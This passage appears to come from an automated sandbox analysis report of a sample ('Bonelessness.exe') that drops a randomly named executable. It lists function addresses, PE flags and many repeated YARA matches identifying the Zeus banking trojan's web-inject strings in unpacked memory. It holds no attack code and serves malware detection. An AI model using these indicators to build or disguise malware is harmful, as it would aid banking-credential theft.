      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024763806_2_02476380
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024743A06_2_024743A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024758406_2_02475840
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024488606_2_02448860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0245D0606_2_0245D060
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247F8606_2_0247F860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024840106_2_02484010
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244E1406_2_0244E140
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024881C36_2_024881C3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247F1906_2_0247F190
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024761A06_2_024761A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024486406_2_02448640
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247AE406_2_0247AE40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246EE306_2_0246EE30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247DF006_2_0247DF00
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247C7106_2_0247C710
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247FF306_2_0247FF30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02479FF06_2_02479FF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02442CE06_2_02442CE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02473DC06_2_02473DC0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D540E06_2_00D540E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D851C06_2_00D851C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D92A4D6_2_00D92A4D
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D59A406_2_00D59A40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8C2406_2_00D8C240
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D802306_2_00D80230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8B3F06_2_00D8B3F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8DB106_2_00D8DB10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8F3006_2_00D8F300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D913306_2_00D91330
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D86C406_2_00D86C40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D59C606_2_00D59C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D6E4606_2_00D6E460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D90C606_2_00D90C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D954106_2_00D95410
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D905906_2_00D90590
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D875A06_2_00D875A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D5F5406_2_00D5F540
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D796E06_2_00D796E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8CEB06_2_00D8CEB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D98FC36_2_00D98FC3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D877806_2_00D87780
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D857A06_2_00D857A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D8E7706_2_00D8E770
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E1CEC18_2_00E1CEC1
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012EE1408_2_012EE140
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013161A08_2_013161A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131F1908_2_0131F190
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013281C38_2_013281C3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013240108_2_01324010
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E88608_2_012E8860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012FD0608_2_012FD060
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131F8608_2_0131F860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013158408_2_01315840
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131D3708_2_0131D370
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013143A08_2_013143A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013163808_2_01316380
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131BAB08_2_0131BAB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013212F08_2_013212F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_013082E08_2_013082E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01313DC08_2_01313DC0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E2CE08_2_012E2CE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131FF308_2_0131FF30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131C7108_2_0131C710
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131DF008_2_0131DF00
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01319FF08_2_01319FF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130EE308_2_0130EE30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E86408_2_012E8640
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0131AE408_2_0131AE40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B51C08_2_012B51C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012840E08_2_012840E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C13308_2_012C1330
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BF3008_2_012BF300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BDB108_2_012BDB10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BB3F08_2_012BB3F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B02308_2_012B0230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C2A4D8_2_012C2A4D
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01289A408_2_01289A40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BC2408_2_012BC240
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0128F5408_2_0128F540
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B75A08_2_012B75A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C05908_2_012C0590
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C54108_2_012C5410
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01289C608_2_01289C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0129E4608_2_0129E460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C0C608_2_012C0C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B6C408_2_012B6C40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BE7708_2_012BE770
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B57A08_2_012B57A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012B77808_2_012B7780
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012C8FC38_2_012C8FC3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012BCEB08_2_012BCEB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012A96E08_2_012A96E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: String function: 00E11BB0 appears 33 times
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216
      Source: Bonelessness.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 1.3.svchost.exe.39e0000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
